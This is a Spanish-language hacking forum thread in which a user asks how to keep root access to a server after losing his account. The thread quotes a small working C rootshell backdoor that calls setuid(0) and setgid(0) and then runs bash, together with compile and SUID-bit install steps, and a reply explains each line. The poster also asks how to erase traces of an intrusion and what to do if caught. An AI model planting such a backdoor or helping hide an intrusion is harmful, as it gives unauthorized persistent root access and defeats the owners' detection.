Resultados 1 al 10 de 10

Abrir una puerta trasera en un sistema Linux?

  1. #1 Abrir una puerta trasera en un sistema Linux? 
    Iniciado
    Fecha de ingreso
    Jul 2002
    Ubicación
    Argentina
    Mensajes
    7
    Descargas
    0
    Uploads
    0
    Como podria hacer para asegurarme de poder volver a entrar a un server donde
    tengo un usuario como root, por si me llegan a borrar dicho user ?





    Otra pregunta... que hace este programita ?


    /* This is my First attempt at coding a rootshell backdoor.
    This file is really simple. It allows a user to become
    root by running this file.

    As root, type gcc -o door door.c
    then chmod 06711 door
    type exit, and dot slash door

    EPiC [H3C]

    */


    #include <stdio.h>
    int main(void) {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "-bash", NULL);
    return 0;
    }


    Gracias!
    I'm Windows.
    Citar  
     

  2. #2  
    Moderador HH
    Fecha de ingreso
    Sep 2002
    Ubicación
    127.0.0.1
    Mensajes
    1.817
    Descargas
    3
    Uploads
    0
    segun dicen sus comentarios es un backdoor de la sesión de root, en teoría lo que estás buscando, las lineas donde pone setuid(0) y setgid(0) en teoría cambian el usuario con el que ejecutes el programa a root( uidroot=0) y el grupo a root.
    la siguiente linea no la entiendo, no estoy acostumbrado a programar en c bajo linux

    -salu2-
    Quien no sabe lo que busca no entiende lo que encuentra.
    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Apr 2002
    Mensajes
    15
    Descargas
    0
    Uploads
    0
    Es un backdoor.

    Te explico:

    /* This is my First attempt at coding a rootshell backdoor.
    This file is really simple. It allows a user to become root by running this file. <<<<<<< Primero tienes q conseguir ser root

    As root, type gcc -o door door.c <<< Cuando seas root, compilas el archivo (este)
    then chmod 06711 door <<< Esto, si no me equivoco, pone el bit SUID al ejecutable, para que SIEMPRE se ejecute como el usario que es su propietario (usease, root) esto es MUY importante, ya que si no la llamadas setuid(0) (que te convierte en root) no funciona
    type exit, and dot slash door << Y esto cierra la sesion root y te la abres otra vez, pero con la back door (para comprobar y tal)

    EPiC [H3C]

    */


    #include <stdio.h>
    int main(void) {
    setuid(0); << Te convierte en root (si no tiene puesto el bit SUID, no hay nada q hacer
    setgid(0); << Te pone en el grupo del root (igual que antes, sin SUID, al carajo)
    execl("/bin/bash", "-bash", NULL); << Esto ejecuta un shell del sistema, es decir, te mantiene como root xDD
    return 0;
    }



    Un consejo, buscate un diccionario y traduce antes de preguntar.
    Citar  
     

  4. #4  
    Administrador Foros HH
    Fecha de ingreso
    Mar 2002
    Mensajes
    3.067
    Descargas
    5
    Uploads
    0
    Raistlin, Flint, Caramon...
    ¿La guerra de la lanza?
    Citar  
     

  5. #5  
    Iniciado
    Fecha de ingreso
    Apr 2002
    Mensajes
    15
    Descargas
    0
    Uploads
    0
    xDDDD


    Prefiero las Cronicas de la DragonLance
    Citar  
     

  6. #6  
    Iniciado
    Fecha de ingreso
    Jul 2002
    Ubicación
    Argentina
    Mensajes
    7
    Descargas
    0
    Uploads
    0
    y cuales serian las huellas a borrar luego de haber entrado a un sistema ?

    y que hacer en caso de que nos encuentren ?

    se agradecen respuestas serias, muchas gracias!
    Citar  
     

  7. #7  
    Emeritus HH-team Avatar de TseTse
    Fecha de ingreso
    Apr 2002
    Ubicación
    Metaverso
    Mensajes
    3.284
    Descargas
    1
    Uploads
    0
    Esa pregunta es muy general, depende de muchos factores como servicios que ejecutes, que se está auditando, firewalls, etc. Depende de lo que hagas y como lo hagas.

    Y si te pillan reza y hazte el loco.

    TseTse
    ͎T͎͎s͎͎e͎͎T͎͎s͎͎e͎
    Citar  
     

  8. #8  
    Avanzado
    Fecha de ingreso
    Jan 2002
    Mensajes
    779
    Descargas
    0
    Uploads
    0
    Depende de lo que hayas hecho en el sistema si te pillan tendras que hacer una cosa u otra...xDDDD aunque me ria esta es una respuesta muy seria (tan seria como tu nick...xDDD)
    Citar  
     

  9. #9  
    Iniciado
    Fecha de ingreso
    Apr 2002
    Mensajes
    15
    Descargas
    0
    Uploads
    0
    Yo que tu windows, no me meteria a trastear ningun ordenador remoto por ahora. Y ni mucho menos ponerme a conseguir roots sin saber que es un sistema unix.
    Consigue antes una cuenta (shell) unix remota en cualquier servidor (se que hay algunos que las ofrecen y gratuitas) y practica con los comandos. No me gustaria oir por las noticias "COGIDO INFRAGANTI PELIGROSISIMO HACKER MIENTRAS HACIA DE LAS SUYAS EN LOS ORDENADORES DE ESTA REDACCION ... (cualquier periodico)" Y lo unico q hacias es no saber que coño estabas haciendo (perdon por la expresion).
    Practica antes, y si puedes tener linux para ello, mejor.
    Saludos.
    Citar  
     

  10. #10  
    Emeritus HH-team Avatar de TseTse
    Fecha de ingreso
    Apr 2002
    Ubicación
    Metaverso
    Mensajes
    3.284
    Descargas
    1
    Uploads
    0
    Una cosa hay que dejar clara, se dejan muchos más rastros en un sistema *nix que en un sistema windows (por norma general). Hay que tener mucho cuidadito con los *nix.

    TseTse
    ͎T͎͎s͎͎e͎͎T͎͎s͎͎e͎
    Citar  
     

Temas similares

  1. Abrir puertos para NO-IP y Kali Linux
    Por mirito en el foro GENERAL
    Respuestas: 1
    Último mensaje: 09-10-2015, 05:46
  2. Encontrada puerta trasera en routers D-Link
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 17-10-2013, 10:37
  3. Respuestas: 0
    Último mensaje: 10-02-2004, 17:00
  4. Respuestas: 1
    Último mensaje: 23-11-2003, 14:01
  5. Respuestas: 0
    Último mensaje: 11-10-2003, 01:39

Marcadores

Marcadores